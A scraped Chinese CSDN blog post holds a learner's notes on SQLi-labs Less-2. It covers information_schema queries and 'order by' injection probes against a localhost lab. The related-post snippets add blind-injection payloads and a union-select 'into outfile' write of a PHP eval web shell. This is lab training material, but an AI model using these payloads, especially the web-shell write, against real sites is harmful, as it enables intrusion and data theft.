lili‘s sqli-labs less02(小猪崽有新发现)

最新推荐文章于 2024-11-10 22:27:03 发布
最新推荐文章于 2024-11-10 22:27:03 发布
阅读量157 收藏
点赞数 2
分类专栏: lili‘s sqli-labs 文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DebbieLi_Ca/article/details/113747224
版权
这篇博客详细记录了作者在安全测试中对SQL注入漏洞的探索,通过对比Less01和Less02两个测试案例,展示了不同的注入手法,如在查询语句后加单引号、使用orderby语句等,揭示了数据库查询的潜在风险,并分享了测试流程和错误判断方法。
摘要由CSDN通过智能技术生成

今天拿到驾照啦~就很快落o! 没想到我这么胆小的又呆头鹅人也可以拿到(●ˇ∀ˇ●)!!因为疫情原因在学校被封闭了好久,导致战线拉得很长别人都是四十天我是四个月诶╥﹏╥... 但!!结果总归是好的,这是②〇②①年的第一个证书了(●'◡'●)

突然惊奇的发现less01和less02的测试流程好像欸~

一.复习MySQL常见查询语句

select table_name from information_schema.tables where table_schema = 'security';

select column_name from information_schema.columns where table_name = 'users';

select id,username,password from security.users;

二.输入语句进行测试

1.

在文本框中语句后加 '

根据显示的错误,判断存在基本的注入漏洞

和第一关的区别是:第一关是select * from user where id = '$传参'(图见上一篇less01https://blog.csdn.net/DebbieLi_Ca/article/details/113575635);第二关是select * from user where id = $传参

2.使用order by语句查询(和less01的差别是在id值后面没有了’  因为传值方式不同)

http://localhost/sqli-labs-master/Less-2/?id=1 order by 1--+

http://localhost/sqli-labs-master/Less-2/?id=1 order by 2--+

http://localhost/sqli-labs-master/Less-2/?id=1 order by 3--+

http://localhost/sqli-labs-master/Less-2/?id=1 order by 4--+时报错说明只有三列

(order by具体用法见https://blog.csdn.net/DebbieLi_Ca/article/details/113575635

 3.其余测试参照less01步骤

Debbie Li
关注
专栏目录
lili-om:LiLi-OM是一种紧密耦合的,基于关键帧的LiDAR惯性测距和制图系统,适用于固态LiDAR和常规LiDAR
04-13
LiLi-OM(LIvox LiDAR惯性里程表和制图) -迈向高性能固态LiDAR惯性里程表和制图 这是LiLi-OM的代码库,LiLi-OM是用于固态LiDAR(Livox Horizo​​n)和常规LiDAR(例如Velodyne)的实时紧密耦合的LiDAR惯性测距和...
lipu-lili-pi-toki-pona:扬·索坦(Jan Sotan)的Toki Pona语法摘要和字典
05-23
lipu lili pi toki pona tl; dr该语法说明和词典显示了我如何使用该语言以及我的原则是什么。 这本来不是本课的任何内容,但我可以将其中的潜力看作是有关该语言的“简要”摘要,或者像是备忘单。 我建议您先检查...
lili‘s sqli-labs LESS06
DebbieLi_Ca的博客
02-17 139
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 第六关与第五关的不同之处是 第五关:http://localhost/sqli-labs-master/Less-5/?id=1' 第六关:http://localhost/sqli-labs-master/Less-6/?id=1" 其余步骤一样~
lili‘s sqli-labs less01(简直是在为难我小猪崽
DebbieLi_Ca的博客
02-04 210
1.方便注入时对sql语句进行判断 在sqli-labs代码里加入: echo $sql; echo "<br>"; 2.我使用的火狐浏览器,添加HackBar
lili‘s sqli-labs LESS09&LESS10
DebbieLi_Ca的博客
02-18 163
LESS09 1.http://127.0.0.1/sqli-labs-master/Less-9/?id=1'order by 3999--+ c此时无论如何order by的值是多少都显示you are in......,所以不能使用这个判断 2.http://127.0.0.1/sqli-labs-master/Less-9/?id=1'and sleep(5)--+ 他一直正在执行转圈圈~并且返回正常,说明存在漏洞(如果存在漏洞,睡眠五秒返回结果) 3.时间盲注方法进行判断(less0..
lili‘s sqli-labs Less07
DebbieLi_Ca的博客
02-18 141
1.http://localhost/sqli-labs-master/Less-7/?id=1')) order by 3--+ 2.http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) union select 1,2,'<?php @eval($_POST["crow"]);?>' into outfile 'E:\\tools\\phpstudy\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\a
lili‘s sqli-labs LESS08
DebbieLi_Ca的博客
02-18 130
布尔盲注,可以参考less05 1.http://127.0.0.1/sqli-labs-master/Less-8/?id=1' 判断此时存在注入漏洞, 2.http://127.0.0.1/sqli-labs-master/Less-8/?id=1' --+ 显示you are in........ 3.http://127.0.0.1/sqli-labs-master/Less-8/?id=1' order by 3--+,说明存在三列 4.参考less05,先判断数据库名,然后二分...
lili‘s sqli-labs LESS-3&LESS-4
DebbieLi_Ca的博客
02-08 149
LESS03 输入?Id=1’后出现错误应为http://127.0.0.1/sqlilabs/Less-3/?id=2’)–+ 错误提示为”2”)LIMIT 0,1’.去掉前后两个单引号,和自己输入的一个单引号后还有两个单引号和一个括号,可推出sql注入中的由单引号和括号和起来的闭合模式。 LESS04 127.0.0.1/sqlilabs/Less-4/id=1’后没有出现错误提示: 输入:127.0.0.1/sqlilabs/Less-4/id=1”后出现错误提示,’”1””)LIMIT 0,
lili’s sqli-labs LESS7,8,9,10 补充知识
DebbieLi_Ca的博客
02-17 138
1.show variables like '%secure%';查看secure-file-priv当前的值,如果显示为NULL,则需要打开E:\tools\phpstudy\phpstudy_pro\Extensions\MySQL5.7.26\my.ini文件,在其中加一句:secure-file-priv="/". 2.一句话木马:php版本:<?php @eval($_POST["crow"]);?>其中crow是密码 (H:\xxxxxxx\Cracer\Cracer安全工具包V
windows下安装sqlmap,并且使用sqlmap对sqli less-1 和less-11进行扫描
m0_52341820的博客
04-14 2712
Ⅰ.sqlmap安装: 在sqlmap.org网站中下载sqlmap压缩包,然后解压缩,同时下载安装python。 ⑤将解压缩后的文件夹放在桌面上。 Ⅱ对less-1进行扫描 打开终端,输入 C:\Users\lili>python C:\Users\李翔宇\Desktop\sqlmapproject-sqlmap-22e7b35/sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=1 –dbs ——爆数据库:共七个数据库 继续输入 C
lili’s LESS05盲注!!(小猪崽觉得这是个什么玩意儿嘤嘤嘤)
DebbieLi_Ca的博客
02-17 125
一.BOOL型-1 1.http://localhost/sqli-labs-master/Less-5/?id=1' 查看是否注入 2.http://localhost/sqli-labs-master/Less-5/?id=1'order by 3--+ 查看有多少列 出现··you are in .......表示成功 3.http://localhost/sqli-labs-master/Less-5/?id=1'and left((select database()),1)='s'--+.
microsoft tts MSSpeech Lili zh-CN_HuiHui 完整
04-23
MSDN Library的这一部分提供的资源可帮助您开始使用Microsoft Speech Platform开发可再发布的语音解决方案。 Microsoft Speech Platform包含一个软件开发工具包(SDK),一个运行时间和运行时语言(可启用语音识别...
LILi-开源
05-09
LILi-040可能是该软件的一个特定版本号,通常包含了一些功能、性能优化或错误修复。对于用户来说,定期更到最版本可以确保获得最佳的使用体验和最的技术进步。 总结,LILi是一个面向Linux的开源工具,专注...
大厂基本功 | MySQL 三大日志 ( binlog、redo log 和 undo log ) 的作用?
langjiaohjiopji的博客
11-06 1222
MySQL日志 主要包括错误日志、查询日志、慢查询日志、事务日志、二进制日志几大类。其中,比较重要的还要属二进制日志binlog(归档日志)和事务日志redo log(重做日志)和undo log(回滚日志)。今天就来聊聊redo log(重做日志)、binlog(归档日志)、两阶段提交、undo log(回滚日志)。MySQL InnoDB 引擎使用redo log(重做日志)保证事务的持久性,使用undo log(回滚日志)来保证事务的原子性。MySQL数据库的数据备份、主备、主主、主从都离不开。
mysql 配置文件 my.cnf 增加 lower_case_table_names = 1 服务启动不了的原因
最新发布
BillKu的博客
11-10 212
只是简单的增加一行配置信息:lower_case_table_names = 1。
ReactPress 安装指南:从 MySQL 安装到项目启动
小牛itbull的博客
11-10 577
ReactPress 是一个基于 React 的开源发布平台,适用于搭建博客、网站或内容管理系统(CMS)。本文将详细介绍如何安装 ReactPress,包括 MySQL 数据库的安装、ReactPress 项目的配置与启动,并特别指出使用 pnpm 而不是 yarn 作为包管理工具。
使用Docker-compose安装mysql5.7
州仔
11-08 225
1.首先选择一个目录用来存放docker-compse文件以及mysql的数据(例如logs、conf)docker发现没有mysql5.7这个镜像会去自动下载,执行完以后MySQL启动成功。2.填写docker-compse.yml内容。宿主机需要开放3306端口。
ubuntu 22.04 server 安装 mysql 5.7.40 LTS
abc
11-06 562
ubuntu 22.04 server 安装 mysql 5.7.40 LTS。
LILI-128流密码的安全性:差分故障攻击分析
这些发现LILI-128的安全性提出了严重警告,因为这种低故障次数的攻击表明LILI-128可能容易受到现实世界中的物理攻击。为了增强LILI-128的密码实现安全性,设计者和实施者需要考虑实施故障检测和防护机制,例如使用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值